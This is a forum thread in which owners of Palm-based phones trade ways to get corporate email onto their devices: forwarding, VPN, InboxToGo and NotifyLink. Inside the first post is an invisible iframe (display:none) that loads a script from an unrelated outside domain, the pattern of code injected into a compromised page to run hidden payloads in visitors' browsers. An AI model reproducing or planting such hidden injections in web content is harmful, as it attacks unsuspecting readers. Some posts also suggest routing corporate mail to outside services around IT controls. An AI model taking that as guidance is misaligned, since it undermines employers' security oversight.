+ Reply to Thread
Page 1 of 4 1 2 3 4 LastLast

Thread: Corp e-mail

Corp e-mail

Just got back to work late last week and have been showing my phone off to everyone.

The IT guys were impressed.

So I said to them...can you send my corporate e-mail to my phone? They were like...uh, well, I know we do it to blackberry's, but we don't know how.

Any one have a clue what I need to tell them/do to the phone so I can mirror my corporate Outlook e-mail?

Thanks<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    Jeff
    Tampa FL
    Blackberry 7230 w/ T-Mobile

E-mail: djjefft@aol.com
    AIM: djjefft

When I had my palm m500 I connected a modem to it and dialed in direct just like I would with a laptop. I used something similar to mobile mail and it worked great. Unfortunatly since that time our IT staff have made some changes to the modem pool and we cannt seem to get by an error (unable to resolve DNS) so I have not gotten it to work. You may want to try using the phone just like a modem and laptop.

PPC6800 OWNER (ALLTEL SERVICE) GREGHARKINS's Avatar

email

cant you just set up your email program like eudora or snapper mail to pull off your corporate servers?
    GREG HARKINS
    GREGHARKINS@BRINGINGFUNTOYOU.COM
    www.bringingfuntoyou.com

Administrator
    their servers may not like outside requests...

very true

I wasnt thinking about that, i had my guy set up something special so i can get my mail.

What about just haveing all your mail automatically forward a copy of all mail to a free service that youcan find on the net and then having a palm email program pull it from there?
    GREG HARKINS
    www.bringingfuntoyou.com

never have done palm e-mail before

So it can't work like a Blackberry? Where when someone sends me the mail, it also automatically goes to the 7135?

Or will I have to sign on to get my e-mail?

Jeff
    Jeff
    Tampa FL

try this

Try www.upoc.com to see if this has any way have all your mail forwarded, although u might be limited to message length because it seems like mostly sms.

You might be able to find a program that automacically checks your email if you can get it forwarded to an off site server.

First option would be check with your IT department and see if they have a way that will let your logon your corp service.

Ill be curious to see how u get this to work, because I would like to give it a try to.
    GREG HARKINS
    www.bringingfuntoyou.com

Re: never have done palm e-mail before

Originally posted by djjefft
    So it can't work like a Blackberry? Where when someone sends me the mail, it also automatically goes to the 7135?

Or will I have to sign on to get my e-mail?

Jeff
    I believe the blackberry is comperable to the Palm i705. As I have the i705 my comments only pertain to that device. The i705 is always transmitting and recieving over the palm radio network. I pay $29 per month for unlimited access to their network. With that I can surf the web and have all my corporate email forwarded to my @palm.com email address. I will get my email on the i705 a few minutes after it hits my corporate mail server. It is pretty slick, there is a LED that flashes green when you have service. If you get an email it flashes red. It is typically called push technology but it is using a radio frequency. Go to http://www.palm.com/products/palmi705/ for more info on the i705 (I am pretty sure the blackberry uses the same technology).

djjeft--I can't speak for a blackberry experience but I use Dataviz InboxToGo which sends all my mail from our Outlook server to their secure server and i dial into their server to retrieve my mail.
    This allows me to dial into their server via Express network and get all my email with attachments.
    My company won't allow me to use a vpn so to sync my email i would have to use the qnc connection at 14.4 to dial in via RAS(remote access server) if you don't need access to attachments you can sync with MobileMail via IMAP4 by dialing into your modem pool. You IT guys should be able to figure that out. You just need the ip address etc. You will need to install the program from the 7135 cd though.

Originally posted by pdageek
    I use Dataviz InboxToGo which sends all my mail from our Outlook server to their secure server and i dial into their server to retrieve my mail.
    This allows me to dial into their server via Express network and get all my email with attachments.
    pdageek, do you know if this would work if you didnt use a Outlook server? I am not sure what server we are using but I know it is not a MS Exchange server. Any details would be greatly appreciated. My company doesnt like outside requests and using qnc or ras to dial in is not working (IT says they dont know why). Currently I can not get my corporate email except by forwarding a copy to my @palm.com email and using the i705. I want to get rid of that device and the monthyl charge and use the 7135 but so far have had no luck. HELP anyone!!

heres the link to dataviz. http://www.dataviz.com/products/inboxtogo/index.html I beta tested inboxtogo and it worked great. I think the yearly service is 69.95. IMHO this is totally worth it because you get attachments and the people receiving your message dont' have to do any translation so its truly seemless. I don't think you have to be on an exchange server for this to work.

The best thing is that you will be able to access the inboxtogo via express network for lightning fast email retrieval. I will be talking to my boss tomorrow about having them pay either express network or the 69.95 yearly fee for inboxtogo. I'll let you know what i find out.

Here are the questions you need to know the answers to:

1) Are your mail servers accessable from the internet without special software (both incoming and outgoing)?

2) If they are not accessable from the internet (for example, dialing into your personal internet account doesn't allow you to access the servers), then what does your company support for access? For me, I have to VPN (Virtual Private Network) using PPTP (Point to Point Tunneling Protocol ) through our firewall, over my exsisting internet connection first, before I can access the servers. I connect to the express network (or while at home I connect to my ISP) and PPTP through that connection to our PPTP server. Once that is done, I can access my corporate network, check email, browse our intranet, etc.

3) What type of mail servers are they (POP, Exchange, Lotus, etc). Just because you use Outlook, doesn't mean you are using an exchange server.

Actually we use netscape communicator but there are a few copies of Outlook floating around the office. The servers are IMAP and I know that presents a little problem for many products (they all seem to support POP). They are not accesable from the internet and we have just started experimenting with VPN. One of my staff uses it on Long Island to connect to our servers bc dial up wasnt cutting it. I am not sure what IT did bc about a year ago I was able to just dial in with my m505 and a snap on modem (just like a laptop). Now even that does not work, althought I can dial in with my laptop and get on our entire network which is why I am VERY confused. All I want is to get my email.

If you can dial into your corporate servers using a traditional DUN process on Windows, you should be able to do the wsame with the Palm (7135). Do you have any post dial scripting or input that occurs on your PC?

I know Multi-Mail supports IMAP as well as POP3:

Access your email in the office and on the road. MultiMail Pro is a direct email client for your Palm Computing® Device. Send and receive email on the road with a modem. Supports NNTP, POP3, IMAP4, and SMTP. Supports MS Exchange, Novell GroupWise, and Lotus Domino.
    MultiMail Conduit lets you send and receive email during synchronization. Bring your email with you to a meeting. Answer email on the train. Supports both Macintosh and Windows platforms.

Folks, I have also approached my company about this and I was told that no I couldn't get my company email on the 6035 or the 7135. The way it was explained to me was that it would require a totally different email account to be set up on the companies servers that would allow for the outside request through a POP3 account. The Blackberry works using a totally dedicated server that communicates directly to the Blackberry, at least that was what was explained in great detail to me.

--terry
    --------------------------------------
    Enjoy the journey, it should be just as much fun as the destination.

Originally posted by WORBC
    Folks, I have also approached my company about this and I was told that no I couldn't get my company email on the 6035 or the 7135. The way it was explained to me was that it would require a totally different email account to be set up on the companies servers that would allow for the outside request through a POP3 account. The Blackberry works using a totally dedicated server that communicates directly to the Blackberry, at least that was what was explained in great detail to me.
    Yes you purchase a Balckberry server from the provider your working with. Then hook it up to your Outlook or Lotus Mail server. It then sychronizes with the mail account there with the one on the Blackberry. It does that by sending encrypted info over the internet to the provider whoose system transmits the info to the blackberry. Replies to email just goes back in the other direction.

Most companies will not all non-company owned devices to be connected to their network for security issues. Email access in no exception.

The BlackBerries also have a desktop oneway version that forwards email based rules to the unit. You could do that with Outlook as your mail client on your desktop. You would just have to leave your Desktop computer on ALL the time with Outlook running. Your company might frown on that also though.

Remember, When the long night comes return to the end of the beginning.

Try Notifylink Desktop edition, works with Outlook and makes your phone work like a Blackberry. I Am also trying Workstyle Desktop edition and it appears to work well also.

John
    John

For more information see barJohn Reviews It

I use a Nortel VPN. For those of you using a vpn, i was informed by one of my colleagues that there is a PalmOS version. Anyone using it?

I have installed NotifyLink on my desktop. It ties to my Outlook 2000 that is up and running and connected to an exchange server. I can specify the folders and filters to indicate which emails to send to the 7135. I am behind a corporate firewall with more security than the average business (Government Facility). It sends out the emails triple DES encrypted to the 7135 that has a Notifylink Palm app. The Palm decrypts it and alerts me when it receives the email. I can then view, reply, etc. (It also does the calendar and more. If I reply, it encrypts and sends back to my Outlook on the desktop and that decrypts and sends the replay as if it came from my desktop. They also sell a server version that is for the enterprise and has more controls.

This one will also work with POP email accounts. It costs $49.00 per client.

There is also Wokstyle Desktop Edition and it is similar but costs $69.00 per year and does not work with POP3 accounts, only with Excahnge Server type environments. They also have a Server version.

Finally, if you are with Verizon they offer a similar service (though not so automated) for $10/mo.

I replaced my Blackberry by doing this. Messages (email) comes in automatically and I can send emails that look like they came from my desktop.

John
    John

For more information see barJohn Reviews It

Thanks John

John, thanks for elaborating on NotifyLink. I sent them an e-mail last night and got a call back from them this afternoon. They were willing to set me up with some sort of a demo version.

Do you need to know proxy server info and incoming and outgoing mail server names and stuff to get this to work.

My IT people are staying away from me since I asked for the server info...

Thanks again...

Jeff

Originally posted by barjohn
    I have installed NotifyLink on my desktop. It ties to my Outlook 2000 that is up and running and connected to an exchange server. I can specify the folders and filters to indicate which emails to send to the 7135. I am behind a corporate firewall with more security than the average business (Government Facility). It sends out the emails triple DES encrypted to the 7135 that has a Notifylink Palm app. The Palm decrypts it and alerts me when it receives the email. I can then view, reply, etc. (It also does the calendar and more. If I reply, it encrypts and sends back to my Outlook on the desktop and that decrypts and sends the replay as if it came from my desktop. They also sell a server version that is for the enterprise and has more controls.

This one will also work with POP email accounts. It costs $49.00 per client.

There is also Wokstyle Desktop Edition and it is similar but costs $69.00 per year and does not work with POP3 accounts, only with Excahnge Server type environments. They also have a Server version.

Finally, if you are with Verizon they offer a similar service (though not so automated) for $10/mo.

I replaced my Blackberry by doing this. Messages (email) comes in automatically and I can send emails that look like they came from my desktop.

John
    Jeff
    Tampa FL